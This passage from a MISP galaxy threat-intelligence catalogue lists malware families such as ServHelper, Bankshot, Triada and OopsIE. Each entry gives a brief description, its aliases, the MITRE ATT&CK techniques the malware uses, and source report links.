uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Startup Items - T1037.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Transfer - T1029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

Table 4957. Table References
Links
https://attack.mitre.org/software/S0283
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07195002/KL_AdwindPublicReport_2016.pdf
https://www.symantec.com/blogs/threat-intelligence/jrat-new-anti-parsing-techniques
https://www.ncsc.gov.uk/report/joint-report-on-publicly-available-hacking-tools

ServHelper - S0382

[ServHelper](https://attack.mitre.org/software/S0382) is a backdoor first observed in late 2018. The backdoor is written in Delphi and is typically delivered as a DLL file.(Citation: Proofpoint TA505 Jan 2019)

The tag is: misp-galaxy:mitre-malware="ServHelper - S0382"

ServHelper - S0382 is also known as:

ServHelper

View relationships graph

ServHelper - S0382 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 4958. Table References
Links
https://attack.mitre.org/software/S0382
https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505

Proxysvc - S0238

[Proxysvc](https://attack.mitre.org/software/S0238) is a malicious DLL used by [Lazarus Group](https://attack.mitre.org/groups/G0032) in a campaign known as Operation GhostSecret. It has appeared to be operating undetected since 2017 and was mostly observed in higher education organizations. The goal of [Proxysvc](https://attack.mitre.org/software/S0238) is to deliver additional payloads to the target and to maintain control for the attacker. It is in the form of a DLL that can also be executed as a standalone process. (Citation: McAfee GhostSecret)

The tag is: misp-galaxy:mitre-malware="Proxysvc - S0238"

Proxysvc - S0238 is also known as:

Proxysvc

View relationships graph

Proxysvc - S0238 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"

Table 4959. Table References
Links
https://attack.mitre.org/software/S0238
https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/

BrainTest - S0293

[BrainTest](https://attack.mitre.org/software/S0293) is a family of Android malware. (Citation: CheckPoint-BrainTest) (Citation: Lookout-BrainTest)

The tag is: misp-galaxy:mitre-malware="BrainTest - S0293"

BrainTest - S0293 is also known as:

BrainTest

View relationships graph

BrainTest - S0293 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify System Partition - T1400" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Manipulate App Store Rankings or Ratings - T1452" with estimative-language:likelihood-probability="almost-certain"

Table 4960. Table References
Links
https://attack.mitre.org/software/S0293
http://blog.checkpoint.com/2015/09/21/braintest-a-new-level-of-sophistication-in-mobile-malware/
https://blog.lookout.com/blog/2016/01/06/brain-test-re-emerges/

Bankshot - S0239

[Bankshot](https://attack.mitre.org/software/S0239) is a remote access tool (RAT) that was first reported by the Department of Homeland Security in December of 2017. In 2018, [Lazarus Group](https://attack.mitre.org/groups/G0032) used the [Bankshot](https://attack.mitre.org/software/S0239) implant in attacks against the Turkish financial sector. (Citation: McAfee Bankshot)

The tag is: misp-galaxy:mitre-malware="Bankshot - S0239"

Bankshot - S0239 is also known as:

Bankshot
Trojan Manuscript

View relationships graph

Bankshot - S0239 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Protocol Impersonation - T1001.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Encoding - T1132.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

Table 4961. Table References
Links
https://attack.mitre.org/software/S0239
https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/

Tangelo - S0329

[Tangelo](https://attack.mitre.org/software/S0329) is iOS malware that is believed to be from the same developers as the [Stealth Mango](https://attack.mitre.org/software/S0328) Android malware. It is not a mobile application, but rather a Debian package that can only run on jailbroken iOS devices. (Citation: Lookout-StealthMango)

The tag is: misp-galaxy:mitre-malware="Tangelo - S0329"

Tangelo - S0329 is also known as:

Tangelo

View relationships graph

Tangelo - S0329 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Stored Application Data - T1409" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"

Table 4962. Table References
Links
https://attack.mitre.org/software/S0329
https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf

VBShower - S0442

[VBShower](https://attack.mitre.org/software/S0442) is a backdoor that has been used by [Inception](https://attack.mitre.org/groups/G0100) since at least 2019. [VBShower](https://attack.mitre.org/software/S0442) has been used as a downloader for second stage payloads, including [PowerShower](https://attack.mitre.org/software/S0441).(Citation: Kaspersky Cloud Atlas August 2019)

The tag is: misp-galaxy:mitre-malware="VBShower - S0442"

VBShower - S0442 is also known as:

VBShower

View relationships graph

VBShower - S0442 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

Table 4963. Table References
Links
https://attack.mitre.org/software/S0442
https://securelist.com/recent-cloud-atlas-activity/92016/

Comnie - S0244

[Comnie](https://attack.mitre.org/software/S0244) is a remote backdoor which has been used in attacks in East Asia. (Citation: Palo Alto Comnie)

The tag is: misp-galaxy:mitre-malware="Comnie - S0244"

Comnie - S0244 is also known as:

Comnie

View relationships graph

Comnie - S0244 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

Table 4964. Table References
Links
https://attack.mitre.org/software/S0244
https://researchcenter.paloaltonetworks.com/2018/01/unit42-comnie-continues-target-organizations-east-asia/

Triada - S0424

[Triada](https://attack.mitre.org/software/S0424) was first reported in 2016 as a second stage malware. Later versions in 2019 appeared with new techniques and as an initial downloader of other Trojan apps.(Citation: Kaspersky Triada March 2016)

The tag is: misp-galaxy:mitre-malware="Triada - S0424"

Triada - S0424 is also known as:

Triada

View relationships graph

Triada - S0424 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Generate Fraudulent Advertising Revenue - T1472" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1474" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Injection - T1540" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted - T1532" with estimative-language:likelihood-probability="almost-certain"

Table 4965. Table References
Links
https://attack.mitre.org/software/S0424
https://www.kaspersky.com/blog/triada-trojan/11481/

BADCALL - S0245

[BADCALL](https://attack.mitre.org/software/S0245) is a Trojan malware variant used by the group [Lazarus Group](https://attack.mitre.org/groups/G0032). (Citation: US-CERT BADCALL)

The tag is: misp-galaxy:mitre-malware="BADCALL - S0245"

BADCALL - S0245 is also known as:

BADCALL

View relationships graph

BADCALL - S0245 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Protocol Impersonation - T1001.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

Table 4966. Table References
Links
https://attack.mitre.org/software/S0245
https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-G.PDF

PLAINTEE - S0254

[PLAINTEE](https://attack.mitre.org/software/S0254) is a malware sample that has been used by [Rancor](https://attack.mitre.org/groups/G0075) in targeted attacks in Singapore and Cambodia. (Citation: Rancor Unit42 June 2018)

The tag is: misp-galaxy:mitre-malware="PLAINTEE - S0254"

PLAINTEE - S0254 is also known as:

PLAINTEE

View relationships graph

PLAINTEE - S0254 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 4967. Table References
Links
https://attack.mitre.org/software/S0254
https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/

USBferry - S0452

[USBferry](https://attack.mitre.org/software/S0452) is an information stealing malware and has been used by [Tropic Trooper](https://attack.mitre.org/groups/G0081) in targeted attacks against Taiwanese and Philippine air-gapped military environments. [USBferry](https://attack.mitre.org/software/S0452) shares an overlapping codebase with [YAHOYAH](https://attack.mitre.org/software/S0388), though it has several features which makes it a distinct piece of malware.(Citation: TrendMicro Tropic Trooper May 2020)

The tag is: misp-galaxy:mitre-malware="USBferry - S0452"

USBferry - S0452 is also known as:

USBferry

View relationships graph

USBferry - S0452 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

Table 4968. Table References
Links
https://attack.mitre.org/software/S0452
https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf

CARROTBAT - S0462

[CARROTBAT](https://attack.mitre.org/software/S0462) is a customized dropper that has been in use since at least 2017. [CARROTBAT](https://attack.mitre.org/software/S0462) has been used to install [SYSCON](https://attack.mitre.org/software/S0464) and has infrastructure overlap with [KONNI](https://attack.mitre.org/software/S0356).(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020)

The tag is: misp-galaxy:mitre-malware="CARROTBAT - S0462"

CARROTBAT - S0462 is also known as:

CARROTBAT

View relationships graph

CARROTBAT - S0462 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

Table 4969. Table References
Links
https://attack.mitre.org/software/S0462
https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/
https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/

HARDRAIN - S0246

[HARDRAIN](https://attack.mitre.org/software/S0246) is a Trojan malware variant reportedly used by the North Korean government. (Citation: US-CERT HARDRAIN March 2018)

The tag is: misp-galaxy:mitre-malware="HARDRAIN - S0246"

HARDRAIN - S0246 is also known as:

HARDRAIN

View relationships graph

HARDRAIN - S0246 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Protocol Impersonation - T1001.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

Table 4970. Table References
Links
https://attack.mitre.org/software/S0246
https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf

BADFLICK - S0642

[BADFLICK](https://attack.mitre.org/software/S0642) is a backdoor used by [Leviathan](https://attack.mitre.org/groups/G0065) in spearphishing campaigns first reported in 2018 that targeted the U.S. engineering and maritime industries.(Citation: FireEye Periscope March 2018)(Citation: Accenture MUDCARP March 2019)

The tag is: misp-galaxy:mitre-malware="BADFLICK - S0642"

BADFLICK - S0642 is also known as:

BADFLICK

View relationships graph

BADFLICK - S0642 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Library - T1560.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

Table 4971. Table References
Links
https://attack.mitre.org/software/S0642
https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html
https://www.accenture.com/us-en/blogs/cyber-defense/mudcarps-focus-on-submarine-technologies

OopsIE - S0264

[OopsIE](https://attack.mitre.org/software/S0264) is a Trojan used by [OilRig](https://attack.mitre.org/groups/G0049) to remotely execute commands as well as upload/download files to/from victims. (Citation: Unit 42 OopsIE! Feb 2018)

The tag is: misp-galaxy:mitre-malware="OopsIE - S0264"

OopsIE - S0264 is also known as:

OopsIE

View relationships graph

OopsIE - S0264 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Transfer Size Limits - T1030" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
